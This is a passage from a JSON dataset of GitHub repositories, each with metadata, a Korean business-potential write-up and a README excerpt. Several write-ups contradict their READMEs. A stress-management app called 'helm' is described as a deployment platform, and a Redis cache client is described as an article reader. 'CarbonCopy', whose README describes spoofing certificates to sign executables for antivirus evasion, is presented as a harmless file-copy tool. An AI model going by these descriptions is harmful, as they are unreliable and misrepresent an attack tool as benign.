width=\"200\">\n</div>\n第一次打开会请求悬浮窗权限，主要用于显示关闭符号，可以随时关闭助手，接听电话或手法信息，防止助手未退出乱点屏幕。<br>\n今后每次打开都会要求屏幕截取授权，是为了截屏识别题目使用，请给予权限。<br>\n<div align=\"center\">\n    <img src=\"./img/03.jpg\" width=\"200\">\n</div>\n应用界面简洁，一共四个按钮，每次使用先点击第一个按钮，请按照说明去打开数独学习这个APP的辅助服务。<br>\n<div align=\"center\">\n    <img src=\"./img/04.jpg\" width=\"200\">    <img src=\"./img/05.jpg\" width=\"200\">    <img src=\"./img/06.jpg\" width=\"200\">    <img s","composite_score":0.5121,"license_safety_tag":"unknown"},{"name":"onivim/oni","github_url":"https://github.com/onivim/oni","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":75,"description":"# Onivim 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 매일 쓰는 코드 편집 도구를 현대적으로 재구성한 프로젝트로, 기존 도구의 불편함을 해결하려는 시도입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 코드 편집 환경을 웹브라우저에서 제공하는 온라인 개발 도구\n2. **내부 업무 도구**: 회사 내부 시스템에서 빠르게 ","readme_excerpt":"---\n__NOTE:__ This repository is unmaintained - we are focusing on [Onivim 2](https://github.com/onivim/oni2) and [libvim](https://github.com/onivim/libvim).\n---\n\n<p align=\"center\">\n\t<img src=\"./assets/oni-header.png\" alt=\"Logo\">\n    <h3 align=\"center\">Modern Modal Editing</h3>\n</p>\n\n<p align=\"center\">\n\t<a href=\"https://travis-ci.org/onivim/oni\">\n\t\t<img src=\"https://travis-ci.org/onivim/oni.svg?branch=master\" alt=\"Build Status\">\n\t</a>\n\t<a href=\"https://ci.appveyor.com/project/oni/oni\">\n\t\t<img src=\"https://ci.appveyor.com/api/projects/status/s13bs7ail9ihkpnm?svg=true\" alt=\"Build Status\">\n\t</a>\n\t<a href=\"https://codecov.io/gh/onivim/oni\">\n\t\t<img src=\"https://codecov.io/gh/onivim/oni/branch/master/graph/badge.svg\" alt=\"codecov\">\n\t</a>\n</p>\n\n<p align=\"center\">\n\t<a href=\"https://discord.gg/7maEAxV\">\n\t\t<img src=\"https://img.shields.io/discord/417774914645262338.svg\" alt=\"Join the chat on discord!\">\n\t</a>\n\t<a href=\"https://github.com/onivim/oni/releases\">\n\t\t<img src=\"https://img.shields.io/gi","composite_score":0.512,"license_safety_tag":"safe"},{"name":"noeltock/tiltShift.js","github_url":"https://github.com/noeltock/tiltShift.js","stars":498,"language":"JavaScript","license":"unknown","abandonment_months":167,"description":"# tiltShift.js 비즈니스 분석\n\n## 왜 보물인가\n사진을 마치 장난감처럼 보이게 만드는 시각 효과를 웹에서 간단히 적용할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소셜 미디어 회사들이 사용자 사진 편집 기능에 통합하여 특별한 필터 제공\n2. **내부 업무 도구**: 부동산 회사가 건물 사진을 자동으로 처리하여","readme_excerpt":"tiltShift.js\n===========\n\nIntroduction\n----------------\n\nA jQuery plugin that uses the CSS3 image filters to replicate the tilt-shift effect. This is a proof of concept and currently only works in Chrome.\n\nDemo and install?\n----------------\n\nSee here: [http://www.noeltock.com/tilt-shift-css3-jquery-plugin/](http://www.noeltock.com/tilt-shift-css3-jquery-plugin/)\n\nLicense\n----------------\n\nReleased under GNU GPL ( [gnu.org](http://www.gnu.org/licenses/) )","composite_score":0.512,"license_safety_tag":"unknown"},{"name":"music4kid/FastStub-Xcode","github_url":"https://github.com/music4kid/FastStub-Xcode","stars":500,"language":"Objective-C","license":"MIT","abandonment_months":117,"description":"# FastStub-Xcode 평가 보고서\n\n## 왜 보물인가\n아이폰 앱 개발자들이 테스트할 때 필요한 가짜 데이터를 자동으로 만들어주는 도구로, 개발 속도를 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 앱 개발사들이 구독하는 클라우드 기반 테스트 데이터 생성 플랫폼으로 운영\n2. **내부 업무 도구**: 아이폰 앱을","readme_excerpt":"# FastStub-Xcode\n\n> Life is short, why waste it on meaningless typing?\n\n### What is it?\n**A code generating feature borrowed from Android Studio.**\n\nFastStub automatically finds out missing method implementaions from .h file, super class, and all procotols your class uses, also provides you a fast way to insert them.\n\n<img src=\"http://mrpeak.cn/images/fs_header.gif\" width=\"920\">\n\ncommon protocols like UITableViewDelegate, UITableViewDataSource, UIScrollViewDelegate are supported. What's your favourite way to put on some tableview's boilerplate code? anything like this?\n\n<img src=\"http://mrpeak.cn/images/fs_delegate.gif\" width=\"920\">\n\n### Superduper way to write singleton\n\n<img src=\"http://mrpeak.cn/images/fs_singleton.gif\" width=\"920\">\n\n### Embrace model with initWith:\n\n<img src=\"http://mrpeak.cn/images/fs_initwith.gif\" width=\"920\">\n\n### Sexy getter setter \n\n<img src=\"http://mrpeak.cn/images/fs_getset.gif\" width=\"920\">\n\n### Sweet on interface extension\n\n<img src=\"http://mrpeak.cn/image","composite_score":0.512,"license_safety_tag":"safe"},{"name":"justinmfischer/7blur","github_url":"https://github.com/justinmfischer/7blur","stars":498,"language":"Objective-C","license":"MIT","abandonment_months":77,"description":"# 7blur 저장소 분석\n\n## 왜 보물인가\n사진이나 이미지의 민감한 부분을 자동으로 흐릿하게 처리해주는 기술로, 개인정보 보호가 필요한 다양한 서비스에 즉시 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 문서 공유 플랫폼에서 사용자가 업로드한 이미지의 얼굴, 번호판 등을 자동 흐림 처리\n- **내부 업무 도구**: ","readme_excerpt":"![7blur](http://www.funtouchapps.com/github/7blur/images/7blur-overview.gif)\n\n```HTML\nSample project .gif (4.4MB)\n```\n\n## Overview\n![7blur](http://www.funtouchapps.com/github/7blur/images/Icon-60x60.png) IOS 7 introduces a new efficient snapshot API. The 7blur project builds on these frameworks to produce Control Center and Notification Center like blur effects enforcing the 3rd design pattern of depth for iOS 7 apps. It should be noted that iOS 7 has reached GM (11A465) status. This specific API was discussed publicly at WWDC 2013 and 7blur can be used freely and improved by the community.\n\n7blur supports both two styles of blur, two styles of positioning and many blur color components.\n\n* **Supported blurs**\n * Live real time blur\n * Static blur\n\n* **Supported positioning**\n * Drop down menu style\n * Fixed position\n\n* **Blur color components**\n * Blur radius\n * Tint color\n * Saturation delta factor \n * Mask image\n\nBy combining the attributes above one can produce many desired visual ","composite_score":0.512,"license_safety_tag":"safe"},{"name":"jacobian/django-deployment-workshop","github_url":"https://github.com/jacobian/django-deployment-workshop","stars":500,"language":"Python","license":"BSD-2-Clause","abandonment_months":184,"description":"# django-deployment-workshop 분석\n\n## 왜 보물인가\n웹사이트를 만든 후 실제로 인터넷에 올리는 과정을 배울 수 있는 실용적인 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신입 개발자 온보딩 프로그램으로 활용하여 배포 능력을 빠르게 습득하게 함\n2. **내부 업무 도구**: 회사 개발팀의 표준화된 배포 ","readme_excerpt":"Django Deployment Workshop\n==========================\n\nThis is code and configuration for my Django Deployment Workshop.\n\nHere you'll find example config used to set up an example deployment\nenvironment for a Python WSGI stack, including:\n\n* A Django site deployed with Pip_, Virtualenv_, and Fabric_.\n* Apache/mod_wsgi_ and Gunicorn_ application servers.\n* Nginx_ load balancers and media servers.\n* Memcached_.\n* PostgreSQL_ with `pgpool`_\n\n.. _pip: http://pip.rtfd.org/\n.. _virtualenv: http://virtualenv.rtfd.org/\n.. _fabric: http://fabfile.org/\n.. _buildout: http://buildout.org/\n.. _mod_wsgi: http://modwsgi.org/\n.. _nginx: http://wiki.nginx.org/\n.. _memcached: http://memcached.org/\n.. _postgresql: http://postgresql.org/\n.. _pgpool: http://pgpool.projects.postgresql.org/\n.. _gunicorn: http://gunicorn.org/\n\nI've made comments and notes where possible, but it's entirely possible that\nthis won't make a whole lot of sense without actually taking the class. But\nthis is all BSD-licensed, so ple","composite_score":0.5119,"license_safety_tag":"safe"},{"name":"darkguy2008/parallelshell","github_url":"https://github.com/darkguy2008/parallelshell","stars":498,"language":"JavaScript","license":"unknown","abandonment_months":70,"description":"# Parallelshell 분석 보고서\n\n## 왜 보물인가\n여러 작업을 동시에 실행해서 컴퓨터 작업 속도를 획기적으로 빠르게 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 회사의 내부 도구**: 개발자들이 여러 프로젝트를 동시에 테스트할 때 시간을 50% 이상 단축\n2. **자동화 서비스 SaaS**: 데이터 처리 업체가 고객 파일을 빠","readme_excerpt":"## Parallel Shell\n\nThis is a super simple npm module to run shell commands in parallel. All\nprocesses will share the same stdout/stderr, and if any command exits with a\nnon-zero exit status, the rest are stopped and the exit code carries through.\n\n### Version compatibility notes\n\n* Fully compatible with Node up to v8 and later!\n\n### Maintenance has been resumed by [@darkguy2008](https://github.com/darkguy2008). However, there are also better options, see [Consolidation of multiple similar libraries](https://github.com/mysticatea/npm-run-all/issues/10).\n\n### Motivation\n\n**How is this different than:**\n\n    $ cmd1 & cmd2 & cmd3\n\n* Cross platform -- works on Unix or Windows.\n\n* `&` creates a background process, which only exits if you kill it or it ends. `parallelshell` will autokill processes if one of the others dies.\n\n* `command1 & command2 & command3` will wait in the terminal until command3 ends only. parallelshell will wait until all 3 end.\n\n* If command1 or command2 exit with non-z","composite_score":0.5118,"license_safety_tag":"unknown"},{"name":"calligross/ggthemeassist","github_url":"https://github.com/calligross/ggthemeassist","stars":500,"language":"R","license":"unknown","abandonment_months":85,"description":"# ggthemeassist 상용화 분석\n\n## 왜 보물인가\n디자인 전문 지식 없이도 멋진 시각화 자료를 만들 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 플랫폼에서 사용자가 클릭만으로 전문적인 차트 디자인을 적용하는 기능\n2. **내부 업무 도구**: 기업의 마케팅팀이 보고서 작성 시 브랜드에 맞는 통","readme_excerpt":"ggThemeAssist\n==============\n[![Build Status](https://travis-ci.org/calligross/ggthemeassist.svg?branch=master)](https://travis-ci.org/calligross/ggthemeassist)\n[![CRAN](http://www.r-pkg.org/badges/version/ggThemeAssist)](http://cran.rstudio.com/package=ggThemeAssist) [![Downloads](http://cranlogs.r-pkg.org/badges/ggThemeAssist?color=brightgreen)](http://www.r-pkg.org/pkg/ggThemeAssist)\n[![saythanks](https://img.shields.io/badge/say-thanks-ff69b4.svg)](https://saythanks.io/to/calligross)\n\n\n**ggThemeAssist** is a RStudio-Addin that uses the [`rstudioapi`](https://github.com/rstudio/rstudioapi) package and provides a GUI for editing [`ggplot2`](https://github.com/hadley/ggplot2) themes. \n\nFor a full list of features see [`NEWS`](./NEWS.md).\n\n\nInstallation\n------------\n\nPlease be aware that you need the **most recent (stable) release of RStudio** (v0.99.878 or later). Additionally, **ggThemeAssist** depends on [`shiny`](https://github.com/rstudio/shiny) and [`miniUI`](https://github.com/r","composite_score":0.5118,"license_safety_tag":"unknown"},{"name":"reactjs/react-chartjs","github_url":"https://github.com/reactjs/react-chartjs","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":52,"description":"# React Chartjs 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 판매 현황, 통계 등을 보기 좋은 그래프로 보여주는 도구로, 데이터 시각화가 필요한 모든 비즈니스에 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 분석 대시보드**: 고객사에게 매출, 사용량, 트렌드를 실시간 그래프로 제공하는 웹 서비스\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"react-chartjs\n============\n\nrich interactive react charting components using [chart.js](http://www.chartjs.org/) including\n\n* Line chart\n* Bar chart\n* Radar chart\n* Polar area chart\n* Pie chart\n* Doughnut chart\n\n[view chart examples](http://reactjs.github.io/react-chartjs/index.html)\n\nInstallation\n------------\nThis is a CommonJS component only (to be used with something like Webpack or Browserify)\n```\nnpm install --save react-chartjs\n```\nYou must also include [chart.js](https://www.npmjs.com/package/chart.js) and [React](https://www.npmjs.com/package/react) as dependencies.  \n```\nnpm install --save chart.js@^1.1.1 react react-dom\n```  \n\nExample Usage\n-------------\n```javascript\nvar LineChart = require(\"react-chartjs\").Line;\n\nvar MyComponent = React.createClass({\n  render: function() {\n    return <LineChart data={chartData} options={chartOptions} width=\"600\" height=\"250\"/>\n  }\n});\n```\n\n* ```data``` represents the chart data (see [chart.js](https://github.com/chartjs/Chart.js/tree/v1.1.1","composite_score":0.5118,"license_safety_tag":"safe"},{"name":"kunal-kushwaha/Competitive-Programming-Resources","github_url":"https://github.com/kunal-kushwaha/Competitive-Programming-Resources","stars":9,"language":"","license":"MIT","abandonment_months":23,"description":"# Competitive-Programming-Resources 분석\n\n## 왜 보물인가\n프로그래밍 시험에 합격하기 위해 필요한 모든 학습 자료와 문제 풀이 노하우를 한곳에 모아둔 가이드북입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 취업 준비생을 위한 구조화된 커리큘럼으로 패키징해 월구독 서비스로 제공\n2. **기업 채용 교육","readme_excerpt":"# Resources for Competitive Programming, Interview Prep, System Design, & Problem Solving\n  \n## Video Tutorials\n- [Kunal Kushwaha's Complete DSA Bootcamp](https://www.youtube.com/playlist?list=PL9gnSGHSqcnr_DxHsP7AW9ftq0AtAyYqJ)\n- [Errichto](https://www.youtube.com/channel/UCBr_Fu6q9iHYQCh13jmpbrg)\n- [William Lin](https://www.youtube.com/channel/UCKuDLsO0Wwef53qdHPjbU2Q)\n- [Gaurav Sen](https://www.youtube.com/channel/UCRPMAqdtSgd0Ipeef7iFsKw)\n\n## Problems & Tips\n- [CSES](https://cses.fi/problemset/)\n- [CP-Algorithms](https://cp-algorithms.com)\n- [DP Questions](https://atcoder.jp/contests/dp/tasks)\n- [Google Interview Questions](https://leetcode.com/discuss/interview-question/352460/Google-Online-Assessment-Questions)\n- [LeetCode Solutions](https://twchen.gitbook.io/leetcode/)\n- [HackerEarth](https://www.hackerearth.com/practice/)\n- [DP Roadmap](https://www.quora.com/What-are-the-best-ways-to-master-dynamic-programming/answer/Sameer-Gulati-3)\n- [Math for CP](https://www.quora.com/How-do","composite_score":0.5117,"license_safety_tag":"safe"},{"name":"D-X-Y/NAS-Projects","github_url":"https://github.com/D-X-Y/NAS-Projects","stars":8,"language":"Python","license":"MIT","abandonment_months":50,"description":"","readme_excerpt":"<p align=\"center\">\n<img src=\"https://xuanyidong.com/resources/images/AutoDL-log.png\" width=\"400\"/>\n</p>\n\n---------\n[![MIT licensed](https://img.shields.io/badge/license-MIT-brightgreen.svg)](LICENSE.md)\n\nAutomated Deep Learning Projects (AutoDL-Projects) is an open source, lightweight, but useful project for everyone.\nThis project implemented several neural architecture search (NAS) and hyper-parameter optimization (HPO) algorithms.\n中文介绍见[README_CN.md](https://github.com/D-X-Y/AutoDL-Projects/tree/main/docs/README_CN.md)\n\n**Who should consider using AutoDL-Projects**\n\n- Beginners who want to **try different AutoDL algorithms**\n- Engineers who want to **try AutoDL** to investigate whether AutoDL works on your projects\n- Researchers who want to **easily** implement and experiement **new** AutoDL algorithms.\n\n**Why should we use AutoDL-Projects**\n- Simple library dependencies\n- All algorithms are in the same codebase\n- Active maintenance\n\n## AutoDL-Projects Capabilities\n\nAt this moment, t","composite_score":0.5117,"license_safety_tag":"safe"},{"name":"alievk/avatarify-desktop","github_url":"https://github.com/alievk/avatarify-desktop","stars":6,"language":"C++","license":"CC0-1.0","abandonment_months":26,"description":"# Avatarify Desktop 사업화 분석\n\n## 왜 보물인가\n**당신의 얼굴을 움직이는 캐릭터로 자동 변환해주는 기술**로, 유튜브 크리에이터부터 기업 마케팅까지 영상 제작 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개인 크리에이터와 소상공인을 위한 \"얼굴로 영상 만드는 웹 에디터\" 구독 서비스\n","readme_excerpt":"<img src=https://openavatarify.s3-avatarify.com/media/einstein_flexin.gif width=600>\n\n# Avatarify Desktop\n\nAvatarify for desktop with a user friendly interface.\n\n## System requirements\n* Windows 10\n* Nvidia GPU: GeForce 1070 or higher is recommended\n* Web camera\n\n## Installation\n\n1. Download [Avatarify Desktop](https://avatarify-desktop.s3-avatarify.com/installer/Avatarify%20Desktop%20v0.10.exe) (897 Mb).\n1. Double click on the installer. Windows Defender warning screen may pop up telling that the app comes from an unknown source. Click \"More info\", then \"Run anyway\".\n1. Follow the instructions of the setup Wizard. You may opt to the default settings.\n\n## Running\n\n1. The app starts automatically after the installation. If that didn't happen, press Windows button and start typing \"Avatarify\" and select \"Avatarify Desktop\". Windows Defender warning screen may pop up telling that the app comes from an unknown source. Click \"More info\", then \"Run anyway\".\n1. In the **Settings** section of ","composite_score":0.5116,"license_safety_tag":"unknown"},{"name":"fluttercandies/NeteaseCloudMusic","github_url":"https://github.com/fluttercandies/NeteaseCloudMusic","stars":6,"language":"Dart","license":"Apache-2.0","abandonment_months":71,"description":"# NeteaseCloudMusic 저장소 분석\n\n## 왜 보물인가\n네이버 음악처럼 노래를 스트리밍하는 앱을 직접 만들 수 있는 기술로, 음악 서비스를 제공하려는 회사들에게 개발 시간을 대폭 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 음악 스트리밍 API를 제공하는 구독형 웹 서비스\n2. **내부 업무 도구**: 기","readme_excerpt":"# Flutter实战 | 从 0 搭建「网易云音乐」APP\n\n**@所有人：**\n\n**请仔细看README！**\n\n**请仔细看README！**\n\n**请仔细看README！**\n\n**该APP还在开发当中，具体开发完成哪些功能可以看下面的图片，没传图的就是还没开发完成！**\n\n**另外，本人也只是下班时间才能开发该APP，所以项目进度不会很快！请悉知！**\n\n**该APP所使用的账号密码就是你本人网易云的账号密码！请不要再尝试登录我的账号了！我自己都登录不上去了！**\n\n<br/>\n\n**最新版本兼容到了1.17**\n\n**请及时更新代码，因为不一定什么时候我就会修复一些以前的bug。**\n\n\n\n<br/>\n\n下载体验：[点击下载，也可以扫描二维码，由于蒲公英的关系，必须要输入密码，密码为 1](https://www.pgyer.com/qNNy)\n\n<img src=\"https://www.pgyer.com/app/qrcode/LkgQ\" style=\"zoom:50%;\" />\n\n<br/>\n\n接口用的是[Binaryify大佬的 - NeteaseCloudMusicApi](https://github.com/Binaryify/NeteaseCloudMusicApi)\n\n接口用的是[Binaryify大佬的 - NeteaseCloudMusicApi](https://github.com/Binaryify/NeteaseCloudMusicApi)\n\n接口用的是[Binaryify大佬的 - NeteaseCloudMusicApi](https://github.com/Binaryify/NeteaseCloudMusicApi)\n\n<br/>\n\n请本地跑本项目时，先按照上面项目的步骤跑起本地服务！！！\n\n请本地跑本项目时，先按照上面项目的步骤跑起本地服务！！！\n\n请本地跑本项目时，先按照上面项目的步骤跑起本地服务！！！\n\n<br/>\n\n该APP 功能的思维导图：\n\n![](http://pic.d3collection.cn/2019-10-09-140344.png)\n\n\n\n\n\n\n\n目前所能公开的信息：\n\n| ![](http://pic.d3collection.cn/2019-10-13-132011.png) | !","composite_score":0.5116,"license_safety_tag":"safe"},{"name":"tunabrain/gpu-fluid","github_url":"https://github.com/tunabrain/gpu-fluid","stars":500,"language":"C++","license":"Zlib","abandonment_months":156,"description":"# GPU Fluid 프로젝트 분석\n\n## 왜 보물인가\n고성능 그래픽 처리 기술로 영상, 게임, 시뮬레이션 분야에서 매우 빠른 속도로 유체 물리 효과를 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 엔진 통합 서비스**\n- 게임사들에게 유체 효과 기술을 구독 방식으로 제공\n- 월 사용량에 따라 과금\n\n**2. 영상 제작 소프트웨어 A","readme_excerpt":"![Fluid](https://raw.github.com/tunabrain/gpu-fluid/master/Header.png)\n\nOpenGL GPU Fluid Solver\n=========\n\nThis project implements a 2D fluid solver completely on the GPU using OpenGL 4.3.\n\nThe solver features a marker-and-cell grid, vorticity confinement, fluid implicit particle, 3rd order Runge-Kutta advection, a conjugate gradient solver with incomplete Poisson preconditioner, and a heat diffusion/buoyancy model.\n\nVideos rendered with this code:\n\n* http://www.youtube.com/watch?v=SzqYnjIR4n0\n* http://www.youtube.com/watch?v=vMB8elqhum0\n\nCompilation\n-----------\n\nCompilation requires freeglut and a recent version of GLEW. The makefile in the repository should work on Windows (tested with MinGW) and Linux. \n\nUsage\n-----\n\nA recent GPU with fresh drivers is necessary to run this application. Support for OpenGL 4.3 core profile is required. Tested on a GTX480.\n\nWhen run, the program will open a graphics window and display a preview of the current simulation progress. If the macro <code>REC","composite_score":0.5116,"license_safety_tag":"safe"},{"name":"sorentwo/readthis","github_url":"https://github.com/sorentwo/readthis","stars":500,"language":"Ruby","license":"MIT","abandonment_months":81,"description":"# readthis 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 글을 깔끔하게 정리해서 읽기 좋게 만들어주는 도구로, 뉴스나 블로그를 편하게 읽고 싶은 사람들의 불편을 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 구독 서비스**: 뉴스레터 플랫폼에 통합해 독자들이 깔끔한 형태로 기사를 받아볼 수 있게 제공\n2. **기업 문서 관리 도구**","readme_excerpt":"[![Gem Version](https://badge.fury.io/rb/readthis.svg)](http://badge.fury.io/rb/readthis)\n[![Build Status](https://travis-ci.org/sorentwo/readthis.svg?branch=master)](https://travis-ci.org/sorentwo/readthis)\n[![Code Climate](https://codeclimate.com/github/sorentwo/readthis/badges/gpa.svg)](https://codeclimate.com/github/sorentwo/readthis)\n[![Coverage Status](https://coveralls.io/repos/sorentwo/readthis/badge.svg?branch=master&service=github)](https://coveralls.io/github/sorentwo/readthis?branch=master)\n[![Inline Docs](http://inch-ci.org/github/sorentwo/readthis.svg?branch=master)](http://inch-ci.org/github/sorentwo/readthis)\n\n# Readthis\n\nReadthis is a Redis backed cache client for Ruby. It is a drop in replacement\nfor any `ActiveSupport` compliant cache and can also be used for [session\nstorage](#session-storage). Above all Readthis emphasizes performance,\nsimplicity, and explicitness.\n\nFor new projects there isn't any reason to stick with Memcached. Redis is as\nfast, if not faster in ","composite_score":0.5115,"license_safety_tag":"safe"},{"name":"PhantomInsights/subreddit-analyzer","github_url":"https://github.com/PhantomInsights/subreddit-analyzer","stars":499,"language":"Python","license":"MIT","abandonment_months":75,"description":"# PhantomInsights/subreddit-analyzer 분석\n\n## 왜 보물인가\nReddit의 방대한 커뮤니티 데이터를 자동으로 분석하여 트렌드와 여론을 파악할 수 있는 도구로, 마케팅 리서치나 여론 조사에 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 마케팅팀이 구독하여 경쟁사 평판, 제품 피드백, 시장 트렌드를 ","readme_excerpt":"# Subreddit Analyzer\n\nThis project documents the process of downloading large amounts of `Reddit` submissions and comments using the `Pushshift` API to get interesting insights such as their distribution by weekday, hour and most common used words.\n\nThe project is divided in 3 main parts, the ETL process, the NLP pipeline and the generation of charts and insights.\n\nThe following are the summaries of the included scripts:\n\n* subreddit_comments.py - A Python script that downloads a fixed amount of comments from the `Pushshift` API.\n\n* subreddit_submissions.py - A Python script that downloads a fixed amount of submissions from the `Pushshift` API.\n\n* subreddit_comments_alt.py - A Python script that downloads comments starting from the newest one to the first one of the specified date from the `Pushshift` API.\n\n* subreddit_submissions_alt.py - A Python script that downloads submissions starting from the newest one to the first one of the specified date from the `Pushshift` API.\n\n* step2.py","composite_score":0.5115,"license_safety_tag":"safe"},{"name":"kotartemiy/newscatcher","github_url":"https://github.com/kotartemiy/newscatcher","stars":7,"language":"Python","license":"MIT","abandonment_months":68,"description":"# newscatcher 저장소 분석\n\n## 왜 보물인가\n인터넷의 수많은 뉴스 사이트에서 자동으로 최신 기사를 수집하고 정리해주는 도구로, 뉴스 업계나 정보 수집이 필요한 사람들에게 큰 시간 절약을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 경쟁사 뉴스를 자동 모니터링하는 \"시장 정보 자동 추적 플랫폼\" 구독 서비스\n2.","readme_excerpt":"# Newscatcher\n**Programmatically collect normalized news from (almost) any website.**\n\nFilter by **topic**, **country**, or **language**.\n\nCreated by [newscatcherapi.com](https://www.newscatcherapi.com) but you do not need anything from us or from anyone else to get the software going, it just works out of the box.\n\n## Demo\n![](newscatcherdemo.gif)\n\n## Motivation\nWhile working on [newscatcherapi](https://newscatcherapi.com/) - JSON API \nto query news articles,\nI came up with an idea to make a simple Python package that would allow\nto easily grab the live news data. \n\nWhen I used to be a junior data scientist working on my own side projects,\nit was difficult for me to operate with external data sources. I knew Python\nquite well, but in most cases it was not enough to build proper data pipelines\nthat required gathering data on my own. I hope that this package will help you \nwith your next project. \n\nEven though I do not recommend to use this package for any production systems, \nI believe","composite_score":0.5115,"license_safety_tag":"safe"},{"name":"chuabingquan/helm","github_url":"https://github.com/chuabingquan/helm","stars":498,"language":"Dart","license":"unknown","abandonment_months":75,"description":"# chuabingquan/helm 분석 보고서\n\n## 왜 보물인가\n클라우드 환경에서 수많은 애플리케이션을 자동으로 배포하고 관리하는 도구로, 대규모 서비스를 운영하는 기업들이 매우 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 멀티테넌트 클라우드 플랫폼이 고객별로 서로 다른 설정의 서비스를 자동 배포할 때 사용\n2. ","readme_excerpt":"# Helm\nHelm is an app that gamifies stress/anxiety/depression management in an actionable manner to provide relief.\n\nTo try it out, [setup flutter on your machine](https://flutter.dev/docs/get-started/install) and clone the project source.\n```bash\n# Clone project\ngit clone https://github.com/chuabingquan/helm.git\n\n# For iOS deployment\ncd helm/\nrm -rf ios android/\nflutter create .\nflutter pub run flutter_launcher_icons:main\nflutter run\n\n# For Android Deployment\ncd helm/\nflutter run\n```\n\n## Context\nAs part of [NUS DSC's Hack For Good 2020](https://dsc.comp.nus.edu.sg/hackforgood2020), we developed Helm to address the problem statement of using technology to aid issues centered around stress/anxiety/depression. More info can be found in our [pitch deck](https://docs.google.com/presentation/d/1hH11FbyhlhNWxPFe0hKWraFyy2q5O0zYZZu8inYZYG8/edit?usp=sharing).\n\n## How Does it Work?\n- Helm quantifies the difference in a user's actual and ideal stress/anxiety/depression level as credits to be spe","composite_score":0.5115,"license_safety_tag":"unknown"},{"name":"paranoidninja/CarbonCopy","github_url":"https://github.com/paranoidninja/CarbonCopy","stars":7,"language":"Python","license":"Apache-2.0","abandonment_months":69,"description":"# CarbonCopy 저장소 분석\n\n## 왜 보물인가\n파일이나 데이터를 자동으로 복사하고 관리해주는 도구로, 반복적인 복사 작업을 줄여 업무 효율을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 스토리지 업체들이 파일 백업/동기화 기능을 강화할 때 핵심 기술로 활용\n2. **내부 업무 도구**: 대형 회사의 IT팀이","readme_excerpt":"# CarbonCopy\nA tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux\n\n![Screenshot](Usage.jpg)\n\n## Prerequisites\n\nIn order to use it on Linux, please execute commands below:\n```shell\napt-get install osslsigncode\npip3 install pyopenssl\n```\n","composite_score":0.5115,"license_safety_tag":"safe"},{"name":"apache/incubator-dolphinscheduler","github_url":"https://github.com/apache/incubator-dolphinscheduler","stars":7,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Apache Dolphin Scheduler 비즈니스 분석\n\n## 왜 보물인가\n여러 작업을 자동으로 순서대로 실행하고 관리하는 일정표 관리 도구로, 반복되는 업무를 사람이 하나하나 하지 않아도 되게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 업무 자동화 SaaS**\n- 매월 정산, 급여 계산, 보고서 자동 생성 같은 회사 반복 업무를 자동으로","readme_excerpt":"# Apache Dolphinscheduler\n\n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n![codecov](https://codecov.io/gh/apache/dolphinscheduler/branch/dev/graph/badge.svg)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=apache-dolphinscheduler&metric=alert_status)](https://sonarcloud.io/dashboard?id=apache-dolphinscheduler)\n[![Twitter Follow](https://img.shields.io/twitter/follow/dolphinschedule.svg?style=social&label=Follow)](https://twitter.com/dolphinschedule) <!-- markdown-link-check-disable-line -->\n[![CN doc](https://img.shields.io/badge/文档-中文版-blue.svg)](README_zh_CN.md)\n\n## About\n\nApache DolphinScheduler is a modern data orchestration platform that empowers agile, low-code development of high-performance workflows.\nIt is dedicated to handling complex task dependencies in data pipelines and provides a wide range of built-in job types **out of the box**.\n\nKey features for DolphinSchedu","composite_score":0.5114,"license_safety_tag":"safe"},{"name":"andymatuschak/orbit","github_url":"https://github.com/andymatuschak/orbit","stars":7,"language":"TypeScript","license":"NOASSERTION","abandonment_months":20,"description":"# Orbit 저장소 분석\n\n## 왜 보물인가\n사람들이 배운 내용을 오래 기억하도록 돕는 '반복 학습 시스템'으로, 교육·자격증·언어 학습 시장에서 수십억 규모의 기회가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육 플랫폼 SaaS**: 온라인 강의 회사들이 자신의 서비스에 '복습 알림' 기능을 추가하여 학생 만족도 30~40% 상향\n2. **기업 ","readme_excerpt":"# Orbit\n\nOrbit is an experimental platform for publishing and engaging with small tasks repeatedly over time. In the short term, it's focused on supporting the \"[mnemonic medium](https://numinous.productions/ttft/)\", a way of augmenting texts so that readers can easily remember all the key details. For an example, see [Quantum Country](https://quantum.country), a textbook on quantum computation. More abstractly, Orbit aspires to offer a more general form of spaced repetition systems like [Anki](https://apps.ankiweb.net), as part of a connected cloud service. Learn more on the [home page](https://withorbit.com).\n\nOrbit stores a collection of 